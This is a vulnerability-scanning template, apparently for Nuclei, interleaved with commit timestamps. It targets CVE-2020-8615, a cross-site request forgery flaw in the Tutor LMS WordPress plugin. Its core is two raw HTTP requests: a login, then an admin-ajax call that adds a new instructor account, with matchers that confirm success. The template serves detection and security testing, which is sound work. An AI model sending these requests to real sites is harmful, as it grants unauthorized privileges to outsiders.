2023-10-17 07:20:28 +00:00
id : CVE-2020-8615
info :
2023-10-17 08:16:05 +00:00
name : Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
2023-10-17 07:20:28 +00:00
author : r3Y3r53
severity : medium
description : |
2023-10-17 17:52:26 +00:00
A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
2023-10-17 07:20:28 +00:00
remediation : update to v.1.5.3
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2020-8615
- https://wpscan.com/vulnerability/10058
- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
2023-10-17 17:52:26 +00:00
- https://wpvulndb.com/vulnerabilities/10058
- https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
2023-10-17 07:20:28 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
cvss-score : 6.5
cve-id : CVE-2020-8615
2023-10-17 17:52:26 +00:00
cwe-id : CWE-352
2023-10-18 16:26:30 +00:00
epss-score : 0.00658
2023-11-23 06:31:41 +00:00
epss-percentile : 0.77225
2023-10-17 07:20:28 +00:00
cpe : cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 2
vendor : themeum
product : tutor_lms
framework : wordpress
publicwww-query : /wp-content/plugins/tutor/
tags : wpscan,packetstorm,cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress
2023-10-17 07:20:28 +00:00
variables :
user : "{{rand_base(6)}}"
pass : "{{rand_base(8)}}"
email : "{{randstr}}@{{rand_base(5)}}.com"
firstname : "{{rand_base(5)}}"
lastname : "{{rand_base(5)}}"
http :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-10-17 08:16:05 +00:00
2023-10-17 07:20:28 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
2023-10-17 08:16:05 +00:00
POST /wp-admin/admin-ajax.php HTTP/1.1
2023-10-17 07:20:28 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-10-17 08:16:05 +00:00
2023-10-17 07:20:28 +00:00
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
cookie-reuse : true
matchers :
- type : dsl
dsl :
- 'contains(content_type_2, "application/json")'
- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
- 'status_code_2 == 200'
condition : and
2023-11-23 06:41:10 +00:00
# digest: 490a0046304402206c3f96a65672cd02a586e48ed32c4cc93a341d799b75b53fb2eaffc520a2f38d0220750c96a6e6cbfdd6c93861b1d0dc9fd247e07832c57911988e3da72d7e9dd460:922c64590222798bb761d5b6d8e72950